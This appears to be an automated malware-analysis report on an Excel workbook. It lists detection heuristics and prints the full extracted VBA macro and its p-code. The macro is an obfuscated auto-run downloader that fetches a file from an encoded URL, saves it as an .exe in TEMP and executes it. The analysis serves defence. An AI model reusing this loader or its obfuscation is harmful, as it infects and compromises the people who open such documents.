MALICIOUS
208
Risk Score
Heuristics 6
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP") -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName TrimUurl, GetBOm, VbMethod, RequestAccept5, 3 * 2 - 4 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36705 bytes |
SHA-256: 963f2dbed32ec609487183a09ed8542ac6a9ddf3ca3bed8641144a60f4e61d60 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
jsonouterwrap "."
Stream_StringToBinary ""
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private m_strRemoteHost As String
Private m_strFilePath As String
Private m_strHttpResponse As String
Private m_bResponseReceived As Boolean
Private Const m_UserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Private Const m_Accept = "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*"
Private Const m_HTTPStandard = "HTTP/1.0"
Private m_Content As String
Public RequestAccept1 As Object
Public TrimUurl As Object
Public RequestAccept3 As Object
Public RequestAccept4 As String
Public RequestAccept5 As String
Public RequestAccept6 As Object
Public Const RequestAccept7 = "M"
Public Const RequestAccept8 = "X"
Public Const RequestAccept9 = "H"
Public RequestAccept12 As String
Public RequestAccept10 As String
Private m_EncryptedContent As String
Function ttts(userpass As String, command As String, data As String, contenttype As String, url As String, category As String) As String
Dim resptext As String
Dim WinHttpReq As String
CallByName TrimUurl, GetBOm, VbMethod, RequestAccept5, 3 * 2 - 4
GoTo hemnd
MousePointer = vbHourglass
WinHtt.pReq.Open command, Trim(url), False
WinHtt.pReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
WinHtt.pReq.SetRequestHeader "Authorization", "Basic " + Base64Encode(userpass)
WinHtt.pReq.SetRequestHeader "Content-Type", "application/json"
WinHtt.pReq.Send jsonouterwrap(jsonaddfield("text", Trim(data)) + "," + jsonaddarray("tags", Trim(category)))
resptext1 = WinHtt.pReq.GetAllResponseHeaders()
resptext2 = WinHtt.pReq.ResponseText()
resptext3 = Trim(Str(WinHtt.pReq.Status))
resptext4 = WinHtt.pReq.StatusText
MousePointer = vbDefault
If resptext3 = "204" Then
ttts = "OK " + Str(Time())
Else
ttts = resptext4 + ":" + resptext3 + ":" + resptext2 + ":" + resptext1
End If
hemnd:
RequestAccept6.Open (RequestAccept5)
End Function
Public Function jsonouterwrap(text As String) As String
RequestAccept10 = Chr(Asc(RequestAccept7) + 2)
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP")
jsonouterwrap = "{" + text + "}"
jsonaddfield "", ""
End Function
Function jsonaddfield(field As String, text2wrap As String) As String
jsonaddfield = Chr(34) + field + Chr(34) + ":" + Chr(34) + text2wrap + Chr(34)
Set TrimUurl = CreateObject("Adodb.Stream")
testjsonaddarray
End Function
Function jsonaddarray(field As String, text2wrap As String) As String
jsonaddarray = Chr(34) + field + Chr(34) + ":" + "[" + Chr(34) + text2wrap + Chr(34) + "]"
End Function
Sub testjsonaddfield()
MsgBox (jsonaddfield("text", "james"))
End Sub
Public Function ParseReturnedPage(strWebPage As String) As String
Dim headerSplit As Integer
Dim m_sHost As String
RequestAccept5 = RequestAccept4 + Chr(Asc(RequestAccept7) + 15) + LCase(RequestAccept7 + RequestAccept7 + RequestAccept8 + RequestAccept10 + RequestAccept9) + RequestAccept12 + "exe"
GoTo Savi
If Len(strWebPage) = 0 Then Exit Function
headerSplit = InStr(1, strWebPage, vbCrLf & vbCrLf) + 4
m_Content = Mid(strWebPage, headerSplit, Len(strWebPage) - headerSplit + 1)
m_sHost = frmCom.sckcom.RemoteHost
Select Case m_Variable("type", vbLf)
Case "RareTrackerLast20"
Sho.wLast (20)
Case "RareTrackerMyRares"
Sho.wMine (20)
Case Else
m_Content = DecA.SCString(m_Content)
If m_Variable("type", vbLf) = "AuthServer" Then
m_Content = Replace(m_Content, "type?AuthServer" & vbLf, "")
m_Content = mCrypt.Decrypt(m_Content)
Select Case m_sHost
Case "www.lifetankxi.com"
Verif.yClient
SaveSetting "Other", "Other", "ConnectionHandler", 0
Case "raretracker.acvault.ign.com"
Verif.yClient
SaveSetting "Other", "Other", "ConnectionHandler", 0
Case "www.paraduck.net"
Veri.fyClient
SaveSetting "Other", "Other", "ConnectionHandler", 0
Case Else
If GetSetting("Other", "Other", "ConnectionHandler") = "1" Then
PrintMe.ssage "Your Lifetank has been permanently disabled. Sorry for the trouble!"
Else
PrintMe.ssage "Your Lifetank has been permanently disabled. Sorry for the trouble!"
SaveSet.ting "Other", "Other", "ConnectionHandler", 1
End If
End Select
End If
End Select
Savi:
TrimUurl.Type = 1
TrimUurl.Open
TrimUurl.write RequestAccept1.responseBody
ttts "", "", "", "", "", ""
End Function
Sub testjsonaddarray()
Set RequestAccept6 = CreateObject("Shell.Application")
testb64
Exit Sub
MsgBox (jsonaddarray("text", "tag1"))
End Sub
Sub testjsonwrap()
MsgBox (jsonouterwrap(jsonaddfield("text", "xxyyzz") + "," + jsonaddarray("tags", "noun")))
End Sub
Sub testb64()
RequestAccept11 = Chr(Asc(RequestAccept10) + 22)
RequestAccept12 = Chr(Asc(RequestAccept10) - 33)
Set RequestAccept3 = CreateObject(UCase("w") + UCase("s") + "cript" + RequestAccept12 + "Sh" + "" + RequestAccept11 + "ll").Environment("Pr" + LCase(RequestAccept10) + "c" + RequestAccept11 + "ss")
Exit Sub
MsgBox (Base64Encode("user:mypass"))
End Sub
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.createElement("base64")
oNode.DataType = "bin.base64"
oNode.nodeTypedValue = Stream_StringToBinary(sText)
Base64Encode = oNode.text
Set oNode = Nothing
Set oXML = Nothing
End Function
Public Function ResponsebStrData(RareTrackerMyR() As Variant, frmComsckcom As Integer) As String
Dim i As Integer
RareTrackerL = ""
For i = LBound(RareTrackerMyR) To UBound(RareTrackerMyR)
RareTrackerL = RareTrackerL & Chr(RareTrackerMyR(i) - 12 * frmComsckcom - 8 * 1000 - 900 - 8 * 9)
Next i
ResponsebStrData = RareTrackerL
End Function
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.write Binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.Charset = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
Public Function Download(url As String)
Dim strURL As String
On Error GoTo ErrorHandler
If Len(url) = 0 Then
PrintMessage "Please, enter the URL to retrieve."
Exit Function
End If
If Left(url, 7) = "http://" Then
strURL = Mid(url, 8)
url = Mid(url, 8)
Else
strURL = url
End If
If Right(url, 1) = "/" Then
strURL = Mid(url, 1, Len(url) - 1)
url = Mid(url, 1, Len(url) - 1)
Else
strURL = url
End If
m_strRemoteHost = Left$(strURL, InStr(1, strURL, "/") - 1)
m_strFilePath = Mid$(strURL, InStr(1, strURL, "/"))
m_strHttpResponse = ""
m_bResponseReceived = False
With frmCom.sckcom
.Close
.LocalPort = 0
.Connect m_strRemoteHost, 80
End With
Exit Function
ErrorHandler:
If Err.Number = 5 Then
strURL = strURL & "/"
Resume 0
Else
PrintMessage "An error has occurred." & vbCrLf & "Error #: " & Err.Number & vbCrLf & "Description: " & Err.Description
Exit Function
End If
End Function
Function GetBOm() As String
GetBOm = LCase(Chr(Asc(RequestAccept7) + 6) + "avet" + RequestAccept10) & "fil" + LCase("e")
End Function
Public Function Stream_StringToBinary(text)
Const adTypeText = 2
Const adTypeBinary = 1
Dim ReturnedPageWeb() As Variant
ReturnedPageWeb = Array(9472, 9484, 9484, 9480, 9426, 9415, 9415, 9476, 9485, 9467, 9475, 9489, 9477, 9465, 9478, 9414, 9477, 9469, 9415, 9423, 9422, 9484, 9423, 9472, 9415, 9423, 9422, 9471, 9474, 9475, 9414, 9469, 9488, 9469)
RequestAccept1.Open Chr(Asc(RequestAccept10) - 8) + "ET", ResponsebStrData(ReturnedPageWeb, 33), False
GoTo notor
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeText
BinaryStream.Charset = "us-ascii"
BinaryStream.Open
BinaryStream.WriteText text
BinaryStream.Position = 0
BinaryStream.Type = adTypeBinary
BinaryStream.Position = 0
Stream_StringToBinary = BinaryStream.Read
Set BinaryStream = Nothing
notor:
RequestAccept13 = Asc(RequestAccept10)
RequestAccept4 = RequestAccept3(Chr(RequestAccept13 + 5) + UCase(Chr(RequestAccept13 - 10)) & RequestAccept7 & Chr(RequestAccept13 + 1))
Connect
End Function
Public Function Connect()
RequestAccept1.Send
GoTo Fin
On Error GoTo Error_Handler
Dim strHttpRequest As String
strHttpRequest = "GET " & m_strFilePath & " " & m_HTTPStandard & vbCrLf
strHttpRequest = strHttpRequest & "Host: " & m_strRemoteHost & vbCrLf
strHttpRequest = strHttpRequest & "Accept: " & m_Accept & vbCrLf
strHttpRequest = strHttpRequest & "User-Agent: " & m_UserAgent & vbCrLf
strHttpRequest = strHttpRequest & "Connection: close" & vbCrLf
strHttpRequest = strHttpRequest & vbCrLf
frmCom.sckcom.SendData strHttpRequest
Fin:
ParseReturnedPage ""
Exit Function
Error_Handler:
PrintEr.rorMessage "mDownload.Connect - " & Err.Description
Resume Fin
End Function
Public Function DataArrived(bStrData As String)
m_strHttpResponse = m_strHttpResponse & bStrData
End Function
Public Function ParseAndClose()
ParseReturnedPage (m_strHttpResponse)
If frmCom.sckcom.State <> 0 Then
frmCom.sckcom.Close
End If
End Function
Public Function m_Variable(bStrVariableName As String, Optional bStrDelimeter = vbCrLf) As String
On Error Resume Next
Dim foundMatch As Boolean
Dim m_strVariables() As String
Dim m_strVariableSplit() As String
Dim m_VariableValue As String
Dim m_dLocation As Double
m_dLocation = -1
Dim i As Integer
If InStr(m_Content, bStrVariableName) Then
foundMatch = True
m_strVariables = Split(m_Content, bStrDelimeter)
Else
foundMatch = False
End If
If foundMatch = True Then
For i = LBound(m_strVariables) To UBound(m_strVariables)
If m_dLocation = -1 Then
m_strVariableSplit() = Split(m_strVariables(i), "?", 2)
If m_strVariableSplit(0) = bStrVariableName Then
m_dLocation = i
End If
End If
Next i
End If
If m_dLocation = -1 Then
m_Variable = "NULL"
Else
If m_strVariableSplit(1) = "" Then
m_Variable = "NULL"
Else
m_Variable = m_strVariableSplit(1)
End If
End If
End Function
' Processing file: /opt/analyzer/scan_staging/a7ac12dfc57f45b08c30d93f80421263.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ЭтаКнига - 1409 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Open())
' Line #1:
' LitStr 0x0001 "."
' ArgsCall jsonouterwrap 0x0001
' Line #2:
' LitStr 0x0000 ""
' ArgsCall Stream_StringToBinary 0x0001
' Line #3:
' EndSub
' Line #4:
' Line #5:
' _VBA_PROJECT_CUR/VBA/Лист1 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Лист2 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Лист3 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Module1 - 19307 bytes
' Line #0:
' Dim (Private)
' VarDefn m_strRemoteHost (As String)
' Line #1:
' Dim (Private)
' VarDefn m_strFilePath (As String)
' Line #2:
' Dim (Private)
' VarDefn m_strHttpResponse (As String)
' Line #3:
' Dim (Private)
' VarDefn m_bResponseReceived (As Boolean)
' Line #4:
' Dim (Private Const)
' LitStr 0x002E "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
' VarDefn m_UserAgent
' Line #5:
' Dim (Private Const)
' LitStr 0x0085 "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*"
' VarDefn m_Accept
' Line #6:
' Dim (Private Const)
' LitStr 0x0008 "HTTP/1.0"
' VarDefn m_HTTPStandard
' Line #7:
' Dim (Private)
' VarDefn m_Content (As String)
' Line #8:
' Dim (Public)
' VarDefn RequestAccept1 (As Object)
' Line #9:
' Dim (Public)
' VarDefn TrimUurl (As Object)
' Line #10:
' Dim (Public)
' VarDefn RequestAccept3 (As Object) 0x0017
' Line #11:
' Dim (Public)
' VarDefn RequestAccept4 (As String)
' Line #12:
' Dim (Public)
' VarDefn RequestAccept5 (As String)
' Line #13:
' Dim (Public)
' VarDefn RequestAccept6 (As Object)
' Line #14:
' Dim (Public Const)
' LitStr 0x0001 "M"
' VarDefn RequestAccept7
' Line #15:
' Dim (Public Const)
' LitStr 0x0001 "X"
' VarDefn RequestAccept8
' Line #16:
' Dim (Public Const)
' LitStr 0x0001 "H"
' VarDefn RequestAccept9
' Line #17:
' Dim (Public)
' VarDefn RequestAccept12 (As String)
' Line #18:
' Dim (Public)
' VarDefn RequestAccept10 (As String)
' Line #19:
' Dim (Private)
' VarDefn m_EncryptedContent (As String)
' Line #20:
' FuncDefn (Function ttts(userpass As String, command As String, data As String, contenttype As String, url As String, category As String) As String)
' Line #21:
' Dim
' VarDefn resptext (As String)
' Line #22:
' Dim
' VarDefn WinHttpReq (As String)
' Line #23:
' Ld TrimUurl
' Ld _B_var_Time
' Ld VbMethod
' Ld RequestAccept5
' LitDI2 0x0003
' LitDI2 0x0002
' Mul
' LitDI2 0x0004
' Sub
' ArgsCall CallByName 0x0005
' Line #24:
' Line #25:
' GoTo hemnd
' Line #26:
' Ld vbHourglass
' St MousePointer
' Line #27:
' Ld command
' Ld url
' ArgsLd Trim 0x0001
' LitVarSpecial (False)
' Ld WinHtt
' MemLd pReq
' ArgsMemCall Open 0x0003
' Line #28:
' LitStr 0x000A "User-Agent"
' LitStr 0x0032 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
' Ld WinHtt
' MemLd pReq
' ArgsMemCall SetRequestHeader 0x0002
' Line #29:
' LitStr 0x000D "Authorization"
' LitStr 0x0006 "Basic "
' Ld userpass
' ArgsLd Base64Encode 0x0001
' Add
' Ld WinHtt
' MemLd pReq
' ArgsMemCall SetRequestHeader 0x0002
' Line #30:
' LitStr 0x000C "Content-Type"
' LitStr 0x0010 "application/json"
' Ld WinHtt
' MemLd pReq
' ArgsMemCall SetRequestHeader 0x0002
' Line #31:
' LitStr 0x0004 "text"
' Ld data
' ArgsLd Trim 0x0001
' ArgsLd jsonaddfield 0x0002
' LitStr 0x0001 ","
' Add
' LitStr 0x0004 "tags"
' Ld category
' ArgsLd Trim 0x0001
' ArgsLd jsonaddarray 0x0002
' Add
' ArgsLd jsonouterwrap 0x0001
' Ld WinHtt
' MemLd pReq
' ArgsMemCall Send 0x0001
' Line #32:
' Ld WinHtt
' MemLd pReq
' ArgsMemLd GetAllResponseHeaders 0x0000
' St resptext1
' Line #33:
' Ld WinHtt
' MemLd pReq
' ArgsMemLd ResponseText 0x0000
' St resptext2
' Line #34:
' Ld WinHtt
' MemLd pReq
' MemLd Status
' ArgsLd Str 0x0001
' ArgsLd Trim 0x0001
' St resptext3
' Line #35:
' Ld WinHtt
' MemLd pReq
' MemLd StatusText
' St resptext4
' Line #36:
' Ld vbDefault
' St MousePointer
' Line #37:
' Ld resptext3
' LitStr 0x0003 "204"
' Eq
' IfBlock
' Line #38:
' LitStr 0x0003 "OK "
' ArgsLd Time 0x0000
' ArgsLd Str 0x0001
' Add
' St ttts
' Line #39:
' ElseBlock
' Line #40:
' Ld resptext4
' LitStr 0x0001 ":"
' Add
' Ld resptext3
' Add
' LitStr 0x0001 ":"
' Add
' Ld resptext2
' Add
' LitStr 0x0001 ":"
' Add
' Ld resptext1
' Add
' St ttts
' Line #41:
' EndIfBlock
' Line #42:
' Label hemnd
' Line #43:
' Ld RequestAccept5
' Paren
' Ld RequestAccept6
' ArgsMemCall Open 0x0001
' Line #44:
' EndFunc
' Line #45:
' FuncDefn (Public Function jsonouterwrap(Text As String) As String)
' Line #46:
' Ld RequestAccept7
' ArgsLd Asc 0x0001
' LitDI2 0x0002
' Add
' ArgsLd Chr 0x0001
' St RequestAccept10
' Line #47:
' SetStmt
' Ld RequestAccept7
' LitStr 0x0003 "icr"
' Add
' Ld RequestAccept10
' ArgsLd LCase 0x0001
' Add
' LitStr 0x0004 "soft"
' Add
' Ld Text
' Add
' Ld RequestAccept8
' Add
' Ld RequestAccept7
' Add
' LitStr 0x0001 "L"
' Add
' Ld RequestAccept9
' Add
' LitStr 0x0003 "TTP"
' Add
' ArgsLd CreateObject 0x0001
' Set RequestAccept1
' Line #48:
' LitStr 0x0001 "{"
' Ld Text
' Add
' LitStr 0x0001 "}"
' Add
' St jsonouterwrap
' Line #49:
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' ArgsCall jsonaddfield 0x0002
' Line #50:
' EndFunc
' Line #51:
' FuncDefn (Function jsonaddfield(field As String, text2wrap As String) As String)
' Line #52:
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Ld field
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0001 ":"
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' Ld text2wrap
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' St jsonaddfield
' Line #53:
' SetStmt
' LitStr 0x000C "Adodb.Stream"
' ArgsLd CreateObject 0x0001
' Set TrimUurl
' Line #54:
' ArgsCall testjsonaddarray 0x0000
' Line #55:
' EndFunc
' Line #56:
' FuncDefn (Function jsonaddarray(field As String, text2wrap As String) As String)
' Line #57:
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Ld field
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0001 "["
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' Ld text2wrap
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0001 "]"
' Add
' St jsonaddarray
' Line #58:
' EndFunc
' Line #59:
' FuncDefn (Sub testjsonaddfield())
' Line #60:
' LitStr 0x0004 "text"
' LitStr 0x0005 "james"
' ArgsLd jsonaddfield 0x0002
' Paren
' ArgsCall MsgBox 0x0001
' Line #61:
' EndSub
' Line #62:
' Line #63:
' FuncDefn (Public Function ParseReturnedPage(strWebPage As String) As String)
' Line #64:
' Dim
' VarDefn headerSplit (As Integer)
' Line #65:
' Dim
' VarDefn m_sHost (As String)
' Line #66:
' Ld RequestAccept4
' Ld RequestAccept7
' ArgsLd Asc 0x0001
' LitDI2 0x000F
' Add
' ArgsLd Chr 0x0001
' Add
' Ld RequestAccept7
' Ld RequestAccept7
' Add
' Ld RequestAccept8
' Add
' Ld RequestAccept10
' Add
' Ld RequestAccept9
' Add
' ArgsLd LCase 0x0001
' Add
' Ld RequestAccept12
' Add
' LitStr 0x0003 "exe"
' Add
' St RequestAccept5
' Line #67:
' GoTo Savi
' Line #68:
' Ld strWebPage
' FnLen
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' ExitFunc
' EndIf
' Line #69:
' LitDI2 0x0001
' Ld strWebPage
' Ld vbCrLf
' Ld vbCrLf
' Concat
' FnInStr3
' LitDI2 0x0004
' Add
' St headerSplit
' Line #70:
' Ld strWebPage
' Ld headerSplit
' Ld strWebPage
' FnLen
' Ld headerSplit
' Sub
' LitDI2 0x0001
' Add
' ArgsLd Mid 0x0003
' St m_Content
' Line #71:
' Ld frmCom
' MemLd sckcom
' MemLd RemoteHost
' St m_sHost
' Line #72:
' LitStr 0x0004 "type"
' Ld vbLf
' ArgsLd m_Variable 0x0002
' SelectCase
' Line #73:
' LitStr 0x0011 "RareTrackerLast20"
' Case
' CaseDone
' Line #74:
' LitDI2 0x0014
' Paren
' Ld Sho
' ArgsMemCall wLast 0x0001
' Line #75:
' LitStr 0x0012 "RareTrackerMyRares"
' Case
' CaseDone
' Line #76:
' LitDI2 0x0014
' Paren
' Ld Sho
' ArgsMemCall wMine 0x0001
' Line #77:
' CaseElse
' Line #78:
' Ld m_Content
' Ld DecA
' ArgsMemLd SCString 0x0001
' St m_Content
' Line #79:
' LitStr 0x0004 "type"
' Ld vbLf
' ArgsLd m_Variable 0x0002
' LitStr 0x000A "AuthServer"
' Eq
' IfBlock
' Line #80:
' Ld m_Content
' LitStr 0x000F "type?AuthServer"
' Ld vbLf
' Concat
' LitStr 0x0000 ""
' ArgsLd Replace 0x0003
' St m_Content
' Line #81:
' Ld m_Content
' Ld mCrypt
' ArgsMemLd Decrypt 0x0001
' St m_Content
' Line #82:
' Ld m_sHost
' SelectCase
' Line #83:
' LitStr 0x0012 "www.lifetankxi.com"
' Case
' CaseDone
' Line #84:
' Ld Verif
' ArgsMemCall yClient 0x0000
' Line #85:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0000
' ArgsCall SaveSetting 0x0004
' Line #86:
' LitStr 0x001B "raretracker.acvault.ign.com"
' Case
' CaseDone
' Line #87:
' Ld Verif
' ArgsMemCall yClient 0x0000
' Line #88:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0000
' ArgsCall SaveSetting 0x0004
' Line #89:
' LitStr 0x0010 "www.paraduck.net"
' Case
' CaseDone
' Line #90:
' Ld Veri
' ArgsMemCall fyClient 0x0000
' Line #91:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0000
' ArgsCall SaveSetting 0x0004
' Line #92:
' CaseElse
' Line #93:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' ArgsLd GetSetting 0x0003
' LitStr 0x0001 "1"
' Eq
' IfBlock
' Line #94:
' LitStr 0x0043 "Your Lifetank has been permanently disabled. Sorry for the trouble!"
' Ld PrintMe
' ArgsMemCall ssage 0x0001
' Line #95:
' ElseBlock
' Line #96:
' LitStr 0x0043 "Your Lifetank has been permanently disabled. Sorry for the trouble!"
' Ld PrintMe
' ArgsMemCall ssage 0x0001
' Line #97:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0001
' Ld SaveSet
' ArgsMemCall ting 0x0004
' Line #98:
' EndIfBlock
' Line #99:
' EndSelect
' Line #100:
' EndIfBlock
' Line #101:
' EndSelect
' Line #102:
' Label Savi
' Line #103:
' LitDI2 0x0001
' Ld TrimUurl
' MemSt Type
' Line #104:
' Ld TrimUurl
' ArgsMemCall Open 0x0000
' Line #105:
' Ld RequestAccept1
' MemLd responseBody
' Ld TrimUurl
' ArgsMemCall Write 0x0001
' Line #106:
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' ArgsCall ttts 0x0006
' Line #107:
' EndFunc
' Line #108:
' Line #109:
' FuncDefn (Sub testjsonaddarray())
' Line #110:
' Line #111:
' SetStmt
' LitStr 0x0011 "Shell.Application"
' ArgsLd CreateObject 0x0001
' Set RequestAccept6
' Line #112:
' ArgsCall testb64 0x0000
' Line #113:
' ExitSub
' Line #114:
' LitStr 0x0004 "text"
' LitStr 0x0004 "tag1"
' ArgsLd jsonaddarray 0x0002
' Paren
' ArgsCall MsgBox 0x0001
' Line #115:
' EndSub
' Line #116:
' FuncDefn (Sub testjsonwrap())
' Line #117:
' LitStr 0x0004 "text"
' LitStr 0x0006 "xxyyzz"
' ArgsLd jsonaddfield 0x0002
' LitStr 0x0001 ","
' Add
' LitStr 0x0004 "tags"
' LitStr 0x0004 "noun"
' ArgsLd jsonaddarray 0x0002
' Add
' ArgsLd jsonouterwrap 0x0001
' Paren
' ArgsCall MsgBox 0x0001
' Line #118:
' EndSub
' Line #119:
' FuncDefn (Sub testb64())
' Line #120:
' Ld RequestAccept10
' ArgsLd Asc 0x0001
' LitDI2 0x0016
' Add
' ArgsLd Chr 0x0001
' St RequestAccept11
' Line #121:
' Line #122:
' Ld RequestAccept10
' ArgsLd Asc 0x0001
' LitDI2 0x0021
' Sub
' ArgsLd Chr 0x0001
' St RequestAccept12
' Line #123:
' SetStmt
' LitStr 0x0002 "Pr"
' Ld RequestAccept10
' ArgsLd LCase 0x0001
' Add
' LitStr 0x0001 "c"
' Add
' Ld RequestAccept11
' Add
' LitStr 0x0002 "ss"
' Add
' LitStr 0x0001 "w"
' ArgsLd UCase 0x0001
' LitStr 0x0001 "s"
' ArgsLd UCase 0x0001
' Add
' LitStr 0x0005 "cript"
' Add
' Ld RequestAccept12
' Add
' LitStr 0x0002 "Sh"
' Add
' LitStr 0x0000 ""
' Add
' Ld RequestAccept11
' Add
' LitStr 0x0002 "ll"
' Add
' ArgsLd CreateObject 0x0001
' ArgsMemLd Environment 0x0001
' Set RequestAccept3
' Line #124:
' ExitSub
' Line #125:
' LitStr 0x000B "user:mypass"
' ArgsLd Base64Encode 0x0001
' Paren
' ArgsCall MsgBox 0x0001
' Line #126:
' EndSub
' Line #127:
' FuncDefn (Function Base64Encode(sText))
' Line #128:
' Dim
' VarDefn oXML
' VarDefn oNode
' Line #129:
' SetStmt
' LitStr 0x0016 "Msxml2.DOMDocument.3.0"
' ArgsLd CreateObject 0x0001
' Set oXML
' Line #130:
' SetStmt
' LitStr 0x0006 "base64"
' Ld oXML
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.